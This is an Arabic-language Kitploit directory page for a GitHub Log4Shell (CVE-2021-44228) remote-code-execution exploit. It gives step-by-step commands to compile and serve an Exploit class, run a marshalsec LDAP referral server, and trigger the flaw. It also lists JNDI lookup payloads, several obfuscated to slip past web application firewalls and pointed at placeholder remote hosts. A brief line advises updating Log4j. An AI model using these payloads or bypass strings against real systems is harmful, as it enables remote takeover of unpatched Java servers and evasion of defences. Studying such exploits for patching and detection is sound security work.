Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228 — نشأ استغلال Log4j RCE هذا من https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce | Kitploit
أدوات/GitHubGitHub/roxas-tan/cve-2021-44228
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتجاوز WAFأداة الوصول عن بعد
GitHubroxas-tan/cve-2021-44228

CVE-2021-44228

نشأ استغلال Log4j RCE هذا من https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

عرض المستودع
10711منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44228 (Apache Log4j تنفيذ الأوامر عن بُعد)

جميع إصدارات log4j-core >=2.0-beta9 و <=2.14.1

الإصدار 1.x به ثغرات أخرى، يُوصى بالتحديث إلى أحدث إصدار.

النشرات الأمنية/النشرات المتعلقة بـ Log4Shell (CVE-2021-44228)

الاستخدام:

قم بتنزيل هذا المشروع، وقم بتجميع كود الاستغلال blob/master/src/main/java/Exploit.java، وابدأ تشغيل خادم ويب للسماح بتنزيل الملف الثنائي المترجم.

root@kitploit:~
git clone https://github.com/roxas-tan/CVE-2021-44228.git
cd CVE-2021-44228

javac Exploit.java

# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure the python webserver is running in the same directory as Exploit.class, to test
  curl -I 127.0.0.1:8888/Exploit.class

قم بتنزيل مشروع آخر وقم بتشغيل تنفيذ خادم LDAP يعيد مراجع JNDI* https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer.java

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

قم ببناء وتشغيل كود التنشيط (محاكاة هجوم log4j على خادم ويب جافا ضعيف) blob/master/src/main/java/log4j.java، وسيظهر تطبيق الآلة الحاسبة.

root@kitploit:~
cd CVE-2021-44228
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# Expect the following
# 1. calculator app appears
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8888/Exploit.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /Exploit.class HTTP/1.1" 200 -

نصائح:

لا تعتمد على إصدار جافا الحالي لإنقاذك. قم بتحديث Log4 (أو قم بإزالة بحث JNDI). قم بتعطيل التوسيع (يبدو فكرة سيئة على أي حال).

تجاوز rc1

على سبيل المثال:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

تجاوز WAF

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

لا تثق في جدار حماية تطبيق الويب.

تفاصيل الثغرة

توفر عمليات البحث (Lookups) طريقة لإضافة قيم إلى تكوين Log4j في أماكن عشوائية.

عمليات البحث

الأساليب التي تسبب تسربًا في النهاية

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()
تنزيل الأداة